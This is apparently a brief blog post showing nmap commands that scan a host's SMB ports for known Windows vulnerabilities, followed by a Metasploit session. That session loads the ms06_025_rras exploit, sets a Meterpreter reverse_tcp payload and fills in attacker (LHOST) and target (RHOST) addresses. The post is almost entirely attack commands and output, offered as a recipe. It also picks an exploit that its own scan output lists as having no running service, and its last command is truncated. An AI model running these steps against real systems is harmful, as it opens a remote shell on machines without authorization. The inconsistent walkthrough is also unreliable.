Nmap & Metasploit Exploit



nmap --script smb-check-vulns.nse -p445 <host>
sudo nmap -sU -sS --script smb-check-vulns.nse -p U:137,T:139 <host>

Script Output

Host script results:
| smb-check-vulns:  
|   MS08-067: VULNERABLE
|   regsvc DoS: regsvc DoS: VULNERABLE
|   SMBv2 DoS (CVE-2009-3103): VULNERABLE
|   MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_  MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/windows/smb/ms06_025_rras
msf exploit(ms06_025_rras) > show payloads
msf exploit(ms06_025_rras) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms06_025_rras) > set LHOST [MY IP ADDRESS]
msf exploit(ms06_025_rras) > set RHOST [TARGET IP]
msf exploit(ms06_025_rras) > show targets
msf exploit(ms06_025_rras) > set TARGET [TARGET ID]
msf exploit(ms06_025_rras) > ex

Powered by Blogger.